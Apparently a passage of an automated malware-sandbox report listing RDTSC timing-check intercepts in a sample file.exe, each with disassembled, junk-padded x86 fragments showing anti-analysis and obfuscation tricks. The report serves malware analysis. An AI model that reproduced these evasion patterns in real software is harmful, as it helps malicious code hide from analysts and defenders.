                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675DDF second address: 675E55 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D3716h], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, 02B7A4A4h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov dword ptr [ebp+12447EC8h], edx 0x0000002c mov eax, dword ptr [ebp+122D0B95h] 0x00000032 push ebx 0x00000033 xor edi, 5F4E9D76h 0x00000039 pop ebx 0x0000003a push FFFFFFFFh 0x0000003c sbb di, 4810h 0x00000041 mov ebx, dword ptr [ebp+122D3852h] 0x00000047 nop 0x00000048 push ecx 0x00000049 jmp 00007F46B8B98B12h 0x0000004e pop ecx 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F46B8B98B14h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B87 second address: 678C10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jns 00007F46B8DCA1AAh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F46B8DCA198h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F46B8DCA198h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 jo 00007F46B8DCA19Ch 0x0000004f xor dword ptr [ebp+122D1B17h], edx 0x00000055 mov bl, 2Dh 0x00000057 push 00000000h 0x00000059 stc 0x0000005a xchg eax, esi 0x0000005b je 00007F46B8DCA1A0h 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679AAB second address: 679AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679AAF second address: 679AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AAFD second address: 67AB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F46B8B98B06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA32 second address: 67BA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA36 second address: 67BAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bl, 26h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F46B8B98B08h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F46B8B98B08h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 mov edi, 2F90B270h 0x00000048 mov ebx, 2D103792h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F46B8B98B13h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BAA6 second address: 67BABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679D53 second address: 679D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F46B8B98B13h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F46B8B98B0Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67EA64 second address: 67EA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jbe 00007F46B8DCA198h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 nop 0x00000016 add edi, dword ptr [ebp+122D365Bh] 0x0000001c push 00000000h 0x0000001e movzx edi, ax 0x00000021 push 00000000h 0x00000023 adc ebx, 0AF963C9h 0x00000029 xchg eax, esi 0x0000002a je 00007F46B8DCA1A8h 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007F46B8DCA196h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6809C4 second address: 6809C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FC10 second address: 67FCA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F46B8DCA1AAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+122D336Ch] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov bx, si 0x0000003e mov eax, dword ptr [ebp+122D16CDh] 0x00000044 mov dword ptr [ebp+1245AF96h], eax 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F46B8DCA198h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 nop 0x00000067 pushad 0x00000068 jnc 00007F46B8DCA198h 0x0000006e push edi 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FCA1 second address: 67FCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680B76 second address: 680B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680B7D second address: 680B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680B83 second address: 680C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+1244AEE8h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F46B8DCA198h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 jnp 00007F46B8DCA1B6h 0x0000003f mov eax, dword ptr [ebp+122D00B9h] 0x00000045 jne 00007F46B8DCA1A4h 0x0000004b pushad 0x0000004c clc 0x0000004d mov dword ptr [ebp+1247758Ch], ecx 0x00000053 popad 0x00000054 push FFFFFFFFh 0x00000056 add bh, 00000071h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e pop eax 0x0000005f jo 00007F46B8DCA196h 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688444 second address: 68847F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F46B8B98B12h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F46B8B98B17h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885C5 second address: 6885C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885C9 second address: 6885D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885D5 second address: 6885F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885F2 second address: 6885F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885F8 second address: 6885FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6885FC second address: 688622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F46B8B98B15h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688622 second address: 688627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CB77 second address: 68CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC38 second address: 68CC3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC3D second address: 68CC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC4D second address: 68CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CC52 second address: 68CC74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD3E second address: 68CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD44 second address: 68CD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD4C second address: 68CD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8DCA19Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jnl 00007F46B8DCA1A0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F46B8DCA1A8h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD90 second address: 68CD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692CE4 second address: 692CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F46B8DCA19Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692CFA second address: 692D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692D04 second address: 692D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692D23 second address: 692D5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F46B8B98B08h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jl 00007F46B8B98B06h 0x0000001a jmp 00007F46B8B98B12h 0x0000001f js 00007F46B8B98B06h 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692EBA second address: 692EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693014 second address: 693035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B11h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698EAB second address: 698EB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698EB1 second address: 698ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F46B8B98B19h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69905A second address: 69906E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F46B8DCA19Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69906E second address: 699072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991C7 second address: 6991CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991CD second address: 6991D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991D5 second address: 6991DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991DB second address: 6991DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991DF second address: 6991FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6991FB second address: 69921F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F46B8B98B0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F46B8B98B06h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jns 00007F46B8B98B0Eh 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6994B6 second address: 6994BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6994BE second address: 6994D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8B98B06h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6994D1 second address: 6994D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6994D5 second address: 6994E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F46B8B98B06h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699640 second address: 699646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699646 second address: 699663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B13h 0x00000007 je 00007F46B8B98B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699663 second address: 69967A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F46B8DCA196h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699C08 second address: 699C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B0Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b jc 00007F46B8B98B06h 0x00000011 pop ebx 0x00000012 jno 00007F46B8B98B0Ah 0x00000018 popad 0x00000019 pushad 0x0000001a jno 00007F46B8B98B08h 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699F1E second address: 699F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F46B8DCA19Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F46B8DCA196h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699F36 second address: 699F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F46B8B98B06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C42C second address: 69C432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C432 second address: 69C436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C436 second address: 69C43C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A19BD second address: 6A19C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A19C7 second address: 6A19E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A19E5 second address: 6A19FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8B98B0Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0934 second address: 6A0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0938 second address: 6A093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A093E second address: 6A0976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F46B8DCA1A2h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007F46B8DCA196h 0x00000012 jmp 00007F46B8DCA1A7h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0D6B second address: 6A0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F46B8B98B06h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651DCA second address: 651DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1876 second address: 6A1880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1880 second address: 6A1884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A013F second address: 6A0145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A91C8 second address: 6A91E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA1A9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE2F8 second address: 6AE317 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8B98B19h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE317 second address: 6AE351 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F46B8DCA1CFh 0x0000000e jmp 00007F46B8DCA1A6h 0x00000013 pushad 0x00000014 jmp 00007F46B8DCA1A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667E6C second address: 651355 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F46B8B98B14h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244D492h], edx 0x00000011 mov dword ptr [ebp+122D2238h], edi 0x00000017 lea eax, dword ptr [ebp+12479BA4h] 0x0000001d jmp 00007F46B8B98B0Eh 0x00000022 push eax 0x00000023 jmp 00007F46B8B98B0Ah 0x00000028 mov dword ptr [esp], eax 0x0000002b add dword ptr [ebp+122D371Bh], ebx 0x00000031 call dword ptr [ebp+122D223Fh] 0x00000037 jnp 00007F46B8B98B24h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F46B8B98B0Ch 0x00000044 rdtsc
